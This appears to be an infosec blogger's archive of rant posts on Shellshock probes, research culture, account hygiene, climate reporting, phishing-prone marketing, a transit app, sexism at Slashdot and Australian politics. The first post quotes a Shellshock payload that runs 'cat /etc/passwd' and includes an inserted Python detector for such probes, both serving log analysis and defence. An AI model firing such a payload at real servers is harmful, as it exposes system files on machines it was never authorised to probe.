Category Archives: Rants

Some people don’t get the hint

85.25.242.250 - - [28/Sep/2014:09:20:12 -0400] "GET / HTTP/1.1" 301 281 "-" "() { foo;};echo;/bin/cat /etc/passwd"
85.25.242.250 - - [28/Sep/2014:22:30:48 -0400] "GET / HTTP/1.1" 500 178 "-" "() { foo;};echo;/bin/cat /etc/passwd"

Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.
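As an added example (not from the original post), here is a small detector that parses Apache combined-format lines like the two above, flags the Shellshock-style "() {" function definition in any header-derived field, and counts probes per source host for an abuse report. The benign third sample line and the 203.0.113.7 address are constructed; the triage rule is a heuristic of my own, not anything the post states.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Apache "combined" format:
#   host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock probes put an exported function definition "() {" at the start
# of a value that a CGI handler will copy into an environment variable, so
# the marker turns up in the request line, Referer or User-Agent fields.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


@dataclass
class Finding:
    host: str
    time: str
    field: str      # which log field carried the marker
    payload: str    # the full field value, kept verbatim for the report
    status: int     # HTTP status the server returned


def parse_combined(line: str) -> Optional[dict]:
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def scan_line(line: str) -> List[Finding]:
    """Return one Finding per field of this line that carries the "() {" marker."""
    rec = parse_combined(line)
    if rec is None:
        return []
    found = []
    for field in ("request", "referer", "agent"):
        if SHELLSHOCK_RE.search(rec[field]):
            found.append(Finding(rec["host"], rec["time"], field,
                                 rec[field], int(rec["status"])))
    return found


def scan_log(lines) -> List[Finding]:
    out: List[Finding] = []
    for line in lines:
        out.extend(scan_line(line))
    return out


def probes_per_host(findings) -> Dict[str, int]:
    """Count probes by source address, the figure you quote when reporting the host."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.host] = counts.get(f.host, 0) + 1
    return counts


def needs_review(findings) -> List[Finding]:
    """Heuristic (assumption): a probe answered with a 3xx or 4xx never reached a
    handler; anything else (200, 500, ...) did reach something and deserves a look."""
    return [f for f in findings if not (300 <= f.status < 500)]


# Constructed sample: the two lines from the post, plus one benign request.
SAMPLE_LOG = [
    '85.25.242.250 - - [28/Sep/2014:09:20:12 -0400] "GET / HTTP/1.1" 301 281 "-" '
    '"() { foo;};echo;/bin/cat /etc/passwd"',
    '85.25.242.250 - - [28/Sep/2014:22:30:48 -0400] "GET / HTTP/1.1" 500 178 "-" '
    '"() { foo;};echo;/bin/cat /etc/passwd"',
    '203.0.113.7 - - [28/Sep/2014:10:00:00 -0400] "GET /index.html HTTP/1.1" 200 5123 "-" '
    '"Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f.time} {f.host} {f.field}={f.payload!r} status={f.status}")
    print("probes per host:", probes_per_host(hits))
    print("needs review:", [(f.host, f.status) for f in needs_review(hits)])
```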

Stop. Just stop.

In the last few weeks, a prominent researcher, Dragos Ruiu (@dragosr) has put his neck out describing some interesting issues with a bunch of his computers. If his indicators of compromise are to be believed (and there is the first problem), we have a significant issue. The problem is the chorus of “It’s not real” “It’s impossible” “It’s fake” is becoming overwhelming without sufficient evidence one way or another. Why are so many folks in our community ready to jump on the negative bandwagon, even if they can’t prove it or simply don’t have enough evidence to say one way or another?

My issue is not “is it true” or “I think it’s true” or “I think it’s false”, it’s that so many info sec “professionals” are basically claiming:

  1. Because I personally can’t verify this issue is true, the issue must be false. QED.

This fails both Logic 101, class 1, and also the scientific method. 

This is not a technical issue, it’s a people issue.

We must support all of our researchers, particularly the wrong ones. This is entirely obvious. If we eat our young and most venerable in front of the world’s media, we will be a laughing stock. Certain “researchers” are used by their journalist “friends” to say very publicly “I think X is a fool for thinking that his computers are suspect”. This is utterly wrong, foolhardy, and works for the click bait articles the J’s write and on their news cycle, not for us.

Not everybody is a viable candidate for having the sample. In my view, the only folks who should have a sample of this thing are those who have sufficient operational security and budget to brick and then utterly destroy at least two or twenty computers in a safe environment. That doesn’t describe many labs. And even then, you should have a good reason for having it. I consider the sample described to needing the electronic equivalent of Level PC4 bio labs. Most labs are not PC4, and I bet most of infosec computing labs are not anywhere near capable of hosting this sample.

Not one of us has all of the skills required to look at this thing. The only way this can be made to work is by working together, pulling together E.Eng folks with the sort of expensive equipment only a well funded organisation or a university lab might muster, microcontroller freaks, firmware folks, CPU microcode folks, USB folks, file system folks, assembly language folks, audio folks, forensic folks, malware folks, folks who are good at certain types of Windows font malware, and so on. There is not a single human being alive who can do it all. It’s no surprise to me that Dragos has struggled to get a reproducible but sterile sample out. I bet most of us would have failed, too.

We must respect and use the scientific method. The scientific method is well tested and true. We must rule out confirmation bias, we must rule out just “well, a $0.10 audio chip will do that as most of them are paired with $0.05 speakers and most of the time it doesn’t matter”. I actually don’t care if this thing is real or not. If it’s real, there will be patches. If it’s not real, it doesn’t matter. I do care about the scientific method, and its lack of application in our research community. We aren’t researchers for the most part, and I find it frustrating that most of us don’t seem to understand the very basic steps of careful lab work and repeating important experiments.

We must allow sufficient time to allow the researchers to collaborate and either have a positive or negative result, analyse their findings and report back to us. Again, I come back to our journalist “friends”, who can’t live without conflict. The 24 hour news cycle is their problem, not our problem. We have Twitter or Google Plus or conferences. Have some respect and wait a little before running to the nearest J “friends” and bleating “It’s an obvious fake”.

We owe a debt to folks like Dragos who have odd results, and who are brave enough to report them publicly. Odd results are what pushes us forward as an industry. Cryptoanalysis wouldn’t exist without them. If we make it hard or impossible for respected folks like Dragos to report odd results, imagine what will happen the next time? What happens if it’s someone without much of a reputation? We need a framework to collaborate, not to tear each other down.

Our industry’s story is not the story about the little boy who cried wolf. We are (or should be) more mature than a child’s nursery rhyme. Have some respect for our profession, and work with researchers rather than sullying their name (and yours and mine) by announcing, before you have proof, that something’s not quite right. If anything, we must celebrate negative results every bit as much as positive results, because I don’t know about you, but I work a lot harder when I know an app is hardened. I try every trick in the book, including the stuff that is bleeding edge as a virtual masterclass in our field. I bet Dragos has given this the sort of inspection that only the most ardent forensic researcher might have done. If he hasn’t gotten that far, it’s either sufficiently advanced to be indistinguishable from magic, or he needs help to let us understand what is actually there. I bet that few of us could have gotten as far as Dragos has.

To me, we must step back, work together as an industry – ask Dragos: “What do you need?” “How can we help?” and if that’s “Give me time”, then let’s step back and give him time. If it’s a USB circuit analyser or a microcontroller dev system and plus some mad soldering skills, well, help him, not tear him down. Dragos has shown he has sufficient operational security to research another 12-24 months on this one. We don’t need to know now, now, or now. We gain nothing by trashing his name.

Just stop. Stop trashing our industry, and let’s work together.

So your Twitter has been hacked. Now what?

So I’m getting a lot of Twitter spam with links to install bad crap on my computer.

More than just occasionally, these DM’s are sent by folks in the infosec field. They should know better than to click unknown links without taking precautions.

So what do you need to do?

Simple. Follow these basic NIST approved rules:

Contain – find out how many of your computers are infected. If you don’t know how to do this, assume they’re all suspect, and ask your family’s tech support. I know you all know the geek in the family, as it’s often me.

Eradicate – Clean up the mess. Sometimes, you can just use anti-virus to clean it up, other times, you need to take drastic action, such as a complete re-install. As I run a Mac household with a single Windows box (the wife’s), I’m moderately safe as I have very good operational security skills. If you’re running Windows, it’s time for Windows 8, or if you don’t like Windows 8, Windows 7 with IE 10.

Recover – If you need to re-install, you had backups, right? Restore them. Get everything back the way you like it.

  • Use the latest operating system. Windows XP has six months left on the clock. Upgrade to Windows 7 or 8. MacOS X 10.8 is a good upgrade if you’re still stuck on an older version. There is no reason not to upgrade. On Linux or your favorite alternative OS, there is zero reason not to use the latest LTS or latest released version. I make sure I live within my home directory, and have a list of packages I like to install on every new Linux install, so I’m productive in Linux about 20-30 minutes after installation.
  • Patch all your systems with all of the latest patches. If you’re not good with this, enable automatic updates so it just happens for you automatically. You may need to reboot occasionally, so do so if your computer is asking you to do that. On Windows 8, it only takes 20 or so seconds. On MacOS X, it even remembers which apps and documents were open.
  • Use a safer browser. Use IE 10. Use the latest Firefox. Use the latest Chrome. Don’t use older browsers or you will get owned.
  • On a trusted device, preferably one that has been completely re-installed, it’s time to change ALL of your passwords as they are ALL compromised unless proven otherwise. I use a password manager. I like KeePass X, 1Password, and a few others. None of my accounts shares a password with any other account, and they’re all ridiculously strong. 
  • Protect your password manager. Make sure you have practiced backing up and restoring your password file. I’ve got it sprinkled around in a few trusted places so that I can recover my life if something bad was to happen to any single or even a few devices.
  • Backups. I know, right? It’s always fun until all your data and life is gone. Backup, backup, backup! There are great tools out there – Time Capsule for Mac, Rebit for Windows, rsync for Unix types.

Learn and improve. It’s important to make sure that your Twitter feed remains your Twitter feed and in fact, all of your other accounts, too.

I never use real data for questions and answers, such as my mother’s maiden name as that’s a public record, or my birth date, which like everyone else, I celebrate once per year and thus you could work it out if you met me even randomly at the right time of the year. These are shared knowledge questions, and thus an attacker can use that to bypass Twitter, Google’s and Facebook’s security settings. I either make it up or just insert a random value. For something low security like a newspaper login or similar, I don’t track these random values as I have my password manager to keep track of the actual password. For high value sites, I will record the random value to “What’s your favorite sports team”. It’s always fun reading out 25 characters of gibberish to a call centre in a developing country.

Last word

I might make a detailed assessment of the DM spam I’m getting, but honestly, it’s so amateur hour I can’t really be bothered. There is no “advanced” persistent threat here – these guys are really “why try harder?” when folks don’t undertake even the most basic of self protection.

Lastly – “don’t click shit”. If you don’t know the person or the URL seems hinky, don’t click it.

That goes double for infosec pros. You know better, or you will just after you click the link in Incognito / private mode. Instead, why not fire up that vulnerable but isolated XP throw away VM with a MITM proxy and do it properly if you really insist on getting pwned. If you don’t have time for that, don’t click shit.

El Reg and the troubling case of climate denialism

This post is a last resort as I’ve had two comments rejected by the moderators at The Register, one of my favorite IT news websites.

Lewis Page is a regular contributor to the Register. For whatever reason, around 50% of his total output there is (willful mis-) reporting on various papers and research on climate science. Considering he (and for what it’s worth, myself) is not a climatologist, it’s very frustrating to see the “science” category tag on these articles. It wouldn’t be so bad if it was marked Opinion or Editorial, and if he wasn’t deliberately misrepresenting the observed facts, papers, research and scientists’ own words, but he has no truck at all with anything that doesn’t fit into his worldview.

Just to be utterly clear – among scientists who are trained in climatology, there is no doubt that we are in a rapidly changing world. Basically the question hasn’t been “if” there’s climate change for about 15-20 years, but “what does it mean to be on this planet in 10-20-50-100 years”. It’s up to us and the politicians to decide “what to do about it”. Even if climate change is not as bad as predicted (which actually, it’s worse than has been predicted), the actions we must take now are good for us and the planet:

  • less air pollution == longer, healthier lives
  • less water pollution == longer, healthier lives
  • lower energy bills == more money for other things
  • less wasteful consumption of a finite non-renewable resource == richer, more economically healthy future and longer production of things we can’t economically make without oil, like certain materials and medicines and so on

There is literally no downside to acting to curb emissions, but there’s a lot on the line if we don’t do something. Personally, I don’t think an ETS is the correct path. It’s a cheap way for the government to earn money and to be seen to be doing something – anything at all – and as it’s a derivative market, it has a colorful history of abuse (such as in Germany, where too many credits were issued, undermining the market, and California, where traders essentially create artificial spikes in price to maximise profits and create artificial blackouts). But despite this, we must move on to the next phase of our industrial planet.

I call on the Register to provide the scientific consensus view. Here’s my rejected comment in full.

It’s my long and fervent wish that the Register would stop publishing these opinion pieces, as I rather enjoy the “call a spade a f$&#ing spade” approach to almost all the other articles, reviews and IT news, which is rather let down by Mr Page’s long standing and regular missives on this topic.

In my opinion, these articles are not “science”, nor are they reasonable journalism, where the authors of the paper might be asked for a comment or an interview to get their side first hand. Mr Page can still have his opinion, but at least pay us the respect of writing about the researchers, paper or presentation in an unbiased way to allow us to compare Mr Page’s opinion with what they really wrote, demonstrated, observed or said.

At least pay us the respect of providing balanced coverage either by providing mainstream climate science coverage in the science category along with Mr Page’s opinion pieces and coverage, or by adding in right of reply, interviews and accurate coverage of what was actually written in the papers and research.

Infosec apostasy

I’ve been mulling this one over for a while. And honestly, after a post to an internal global mail list at work putting forward my ideas, I’ve come to realise there are at least two camps in information security:

  • Those who aim via various usual suspects to protect things
  • Those who aim via various often controversial and novel means to protect people 

Think about this for one second. If your compliance program is entirely around protecting critical data assets, you’re protecting things. If your infosec program is about reducing fraud, building resilience, or reducing harmful events, you’re protecting people, often from themselves.

I didn’t think my rather longish post, which brought together the ideas of the information swarm (it’s there, deal with it), information security asymmetry and pets/cattle (I rather like this one), would land with the heavy thud akin to 95 bullet points nailed to the church door.

So I started thinking – why do people still promulgate stupid policies that have no bearing on evidence? Why do people still believe in policies, standards, and spending squillions on edge and end point protection when it is trivial to break?

Faith.

Faith in our dads and grand dads that their received wisdom is appropriate for today’s conditions.

“Si Dieu n’existait pas, il faudrait l’inventer” (“If God did not exist, it would be necessary to invent him”) – Voltaire

(Often mis-translated as “if religion did not exist, it would be necessary to create it”, but close enough for my purposes)

I think we’re seeing the beginning of infosec religion, where it is not acceptable to speak up against unthinking enforcement of hand me down policies like 30 day password resets or absurd password complexity, where it is impossible to ask for reasonable alternatives when you attempt to rule out the imbecilic alternatives like basic authentication headers.

We cannot expect everyone using IT to do it right, or have high levels of operational security. Folks often have a quizzical laugh at my rather large random password collection and use of virtual machines to isolate Java and an icky SOE. But you know what? When Linked In got pwned, I had zero fears that my use of Linked In would compromise anything else. I had used a longish random password unique to Linked In. So I could take my time to reset that password, safe in the knowledge that even with the best GPU crackers in existence, the heat death of the universe would come before my password hash was cracked. Plenty of time. Fantastic … for me, and I finally get a pay off for being so paranoid.

But… I don’t check my main OS every day for malware I didn’t create. I don’t check the insides of my various devices for evil maid MITM or keyloggers. Let’s be honest – no one but the ultra paranoid do this, and they don’t get anything done. But infosec purists expect everyone to have a bleached white pristine machine to do things – or else the user is at fault for not maintaining their systems.

We have to stop protecting things and start protecting humans, by creating human friendly, resilient processes with appropriate checks and balances that do not break as soon as a key logger or network sniffer or more to the point, some skill is brought to bear. Security must be agreeable to humans, transparent (as in plain sight as well as easy to follow), equitable, and the user has to be in charge of their identity and linked personas, and ultimately their preferred level of privacy.

I am nailing my colors to the mast – we need to make information technology work for humans. It is our creature, to do with as we want. This human says “no

Marketing – first against the wall when the revolution comes

A colleague of mine just received one of those awful marketing calls where the vendor rings *you* and demands your personal information “for privacy reasons” before continuing with the phone call.

*Click*

As a consumer, you must hang up to avoid being scammed. End of story. No exceptions.

Even if the business has a relationship with the consumer, asking them to prove who they are is wildly inappropriate. Under no circumstances should a customer be required to provide personal information to an unknown caller. It must be the other way around – the firm must provide positive proof of who they are! And by calling the client, the firm already knows who the client is, so there’s no reason for the client to prove who they are.

As a business, you are directly hurting your bottom line and snatching defeat from the jaws of victory by asking your customers to prove their identity to you.

This is about the dumbest marketing mistake ever – many customers will automatically assume (correctly in my view) that the campaign is a scam, and repeatedly hang up, thus lowering goal completion rates and driving up the cost of sales. Thus this dumb move can cost a company millions in opportunity costs in the form of:

  • wasted marketing (hundreds of dropped customer contacts for every “successful” completed sale),
  • increased fraud against the consumer and ultimately the business when customers reject fraudulent transactions,
  • losing thousands if not hundreds of thousands of customers, and their ongoing and future revenue, if they lose trust in the firm, or if the firm’s lack of fraud prevention causes them to suffer fraud by allowing scammers to easily harvest PII from the customer base and misuse it.

Customers hate moving businesses once they have settled on a supplier of choice, but if you keep on hassling them the wrong way, they do up and leave.

So if any of you are in marketing or are facing pressure from the business to start your call script by asking for personally identifying information from your customers, you are training your customers to become victims of phishing attacks, which will cost you millions of dollars and many more lost customers than you’ll ever gain from doing the right thing.

It’s more than just time to change this very, very, very bad habit.

Responsible disclosure failed – Apple ID password reset flaw

Responsible disclosure is a double edged sword. The Faustian bargain is that I keep my mouth shut to give you time to fix the flaws, not to ignore me. I would humbly suggest that it is very relevant to your interests when a top security researcher submits a business logic flaw to you that is trivially exploitable with just iTunes or a browser, requiring no actual hacking skills.

If anyone knows anyone at Apple, please re-share or forward this post, and ask them to review my rather detailed description of my rather simple method of exploiting the Apple ID password reset system I submitted over six months ago with so far zero response beyond an automated reply. The report tracking number is #221529179 submitted August 12, 2012.

My issue should be fixed along with the other issues before they let password reset back online with my flaw intact.

PTV iPhone app – worst public transport app ever, or just pure evil?

I take the train between Marshall and Southern Cross Station, a terminus station with 14 or 15 platforms and hundreds of V/Line country, suburban and bus services daily. I had an app that worked (the old MetLink app). That wasn’t stellar, but it worked well enough that I didn’t need to get a paper timetable.

So imagine my continuing frustration that the most basic of use cases just doesn’t work in the complete re-write of the new app:

I cannot find my station when standing on the station platform (!) using location search or by searching for the station in the default “Trains” mode the app comes in from the AppStore.

It cannot find the terminus of all V/Line services – Southern Cross Station. I’m serious. In “Train” mode, you cannot search for V/Line services or stations. In “V/Line” mode, Southern Cross is not even a station (!!). You cannot find it by clicking on “Find my location” icon whilst in the station (!), and you cannot choose it from the map, and you cannot search for it. Epic fail of all epic fails. It’s like the PTV app designers chose not to walk the 40 m from their office block to the biggest and busiest station in all of Victoria and test it out.

Modality. It’s nearly impossible to work out that you can change the mode of transport you’re looking up by clicking the word “Trains” at the bottom of the screen. I am catching a “train”, but not the default type of “train”. Who knew? The thought that there are multiple types of trains obviously never occurred to PTV’s UX designers. There’s no button shape or indicator, it’s just in a button bar by itself, which usually means that there are no other choices.

Honestly, PTV need to test their apps:

  • You should be able to find all the services within 500 m of where you are standing. Just list them all and let the filter function narrow things down in one or two keytaps.
  • You should be able to find ANY station or service or transport mode via text search. It’s just not that hard. There should be no difference between a regional bus, a metropolitan tram, an intercity V/Line service, or a station or bus stop. List ‘em all, and let the filter work its magic in a few keystrokes.
  • Get rid of modes. I don’t think of modes and I use at least two every day. Free up that wasted screen real estate and replace it with a search function that works across all modes, and services.
  • You should be able to view a line’s entire timetable with no more than two or three clicks. Timetables -> scroll to the timetable or tap in enough to narrow things down -> voila. It’s not rocket science. Allow it to be a favorite.
  • Planning a multi-mode trip is not rocket science. This is just not possible with the current PTV app.
  • The old app had notifications for the services / lines you were interested in. Please bring it back. This feature may actually be in the PTV app – I simply don’t know because I have not been able to find my station or the station at which I get off.

This app is terrible. It must be withdrawn.

Shame, Slashdot, Shame – misogyny and moderation

Our industry suffers from a lack of women – women in senior positions are very rare, women who do what I do I can count on my hands without resorting to binary, and there are so few women coming out of Uni comp sci, developers and engineering courses that I can use and craft into my replacements.

IT needs women, and lots more of them, not only for the perspective they can bring to the table, but simply in the terrible truth that young women deciding on future careers at high school don’t see any future for themselves in our great industry, or any of the Science, Technology, Engineering or Medical research (STEM) subjects as a valid career choice.

There is so much to do to rectify this situation, not the least eliminating low hanging fruit, such as eliminating booth babes. I’ve heard lots of excuses, like:

  • “It’s a legal job, I don’t see the problem” (this one makes the least amount of sense)
  • “Everyone does it” (no, they most certainly don’t)

So when /. posts a story on what booth babes really think of us leering at them, you know it’s going to be a stinky disgusting mess, but you have to try to convert the heathens in any case.

I’ve been a Slashdot irregular for years. In 1999, the /. “community” said some disgusting things about Richard Stevens, the author of some of the (still) best Unix and TCP/IP books. I stopped going there every day after that shameful episode. I’ve not posted there since 2010, but I have /. in my RSS feed.

I have removed that feed today and I will be deleting my account shortly.

Why?

Many of you know my very low opinion of IT vendors who use booth babes at trade shows.

Update: I found this comment to a similar post last year just a few minutes ago:

Thanks for making the main point clear, I want to chime in here as a woman and someone who has represented my company from very early on at trade shows (and does to this day). In the telecom industry in particular these booth babes run rampant, they literally provide you with a form when you register to exhibit asking if you want to hire models.

At one event a couple years ago, a guy came over to talk with our CTO (a guy) and I and said point blank to me, “do you have an ownership stake in the company? if not, at least you’ve got one foot in the door to marry this guy?” Nevermind that I’m wearing my wedding ring! All I could do was paint a “go F&%$ yourself” smile on my face and wait for him to leave. The things I would have liked to say, but it just wasn’t worth it in that context.

The problem is, most people don’t walk up to me expecting me to know about APIs, building applications, solving problems specific to their industry or use case, how supply chain works, or anything else important to their business. This is perpetuated by booth babes. How do I know? If I dress in a frumpy or slightly less feminine style, instead of my normal stylish heels and a skirt suit, I get a different reaction. If I wear skinny jeans and flats and a tshirt or hoodie, look my age (early 20s) and have a self-effacing air, they think “oh she’s a nerdy girl” and then they ask the real questions. PUH-LEASE.

If you are a vendor, I have a very strict, and very long standing rule – if you use booth babes, I either don’t recommend you to my clients, or I actively campaign against you, and I will never, ever buy from you again. Such vendors have lost more than a $1m in recommendations from me alone in the last 10 years, and I doubt I am alone in my opinion of such appalling, women hating sales tactics.

So fast forward to today. I logged in after a few days to see if my romantic idealization of early Slashdot met up with even 1999 Slashdot low life scum. I was saddened and disappointed. I lost my decade long “excellent” karma rating to peer moderation, and it’s no surprise the peers at Slashdot hate women.

One of my posts had to get more than seven negative flamebait downward moderation clicks to get the score it finally received.

So let’s look at the quality gem of a reply that gets +5 moderation (errors in copy and paste I will leave to the troll, can’t even do that right):

“ook at my low user ID, I’ve been here for longer than some of you have been alive.”

No one cares. I’m probably the same age as you but I don’t go around pointing it out as if it somehow adds extra weight to the argument.

“I am literally white hot angry with whomever did it b”

You’ll get over it.

“f you have a daughter, I expect you’ll want her to be a geekgrrl. If you want that outcome, you will join me in boycotting booth babes.”

Actually if I had a daughter I’d let her do whatever she wanted. Unfortunately you obviously don’t realise it but you’re just another one of those self righteous prudish males who seem to think that women should only do the jobs YOU approve of. Newsflash pal – it’s the WOMEN who get to decide whether to do it, not people like you.

I suspect in another century you’d be at the pulpit foaming at the mouth and damning any woman who dared go out with an unmarried man or wear a short skirt or speak before a man gave her permission.

You know what – Fuck you and your kind.

From viol8, a 40-something troll programmer who lives and works somewhere in Europe (if he can be trusted to thump things into the post box), who comes across as an arrogant Australian or English ex pat. I can’t be arsed working out who he is any longer – he’s exactly like any number of the worthless women hating smegheads that infest slashdot.

It’s time to put /. out of its misery and terminal decline. It has been an irrelevant community for years, and now the cesspool is dead to me.

ajv (4061, ex-member /. 1997-2012)

Update: RSS feed – deleted. Twitter – unfollowed. Can I find how to delete my /. account, no I can’t. Help appreciated in the box below.

Political expediency

Last week, Julia Gillard listened to Clubs Australia and the few voters out at Rooty Hill RSL rather than do the right thing and fix problem gambling. In her announcement, she used the code word “gaming”, which is industry speak that doesn’t like to be called “gambling”. By using this special phrase, it’s obvious that for-profit gambling is more important to her than the lives of problem gamblers and society’s fabric, particularly those who are close to problem gamblers.

The problem isn’t the little flutters that most of us have from time to time, it’s the problem gamblers who form much of the industry’s profits. The for-profit firms have shown no mercy in their campaign to get rid of gambling reform. They succeeded.

The problem is the ALP now sways in the wind to the tune of vested interests rather than the public good. Whitlam didn’t give up on creating Medicare just because the AMA was against it. Hawke and Keating didn’t give up on monetary reform, such as floating the dollar or removing trade barriers that have made us far richer, just because the unions were against it.

The ALP will be in the wilderness for a very long time after the next election. They can’t rule by themselves for many years because they have given up on traditional ALP values, and abandoned and cast off a good percentage of their party support base to the Greens.

If the ALP wants to govern again, it needs to get some vision aligned with its core values, and do it. Kicking refugees, dropping gambling reform, and working against gay marriage are none of these things. Once Craig Thompson has gone (and although I reckon he will hang on until convicted, he surely will be forced to go), the ALP will feel the full wrath of its core voters.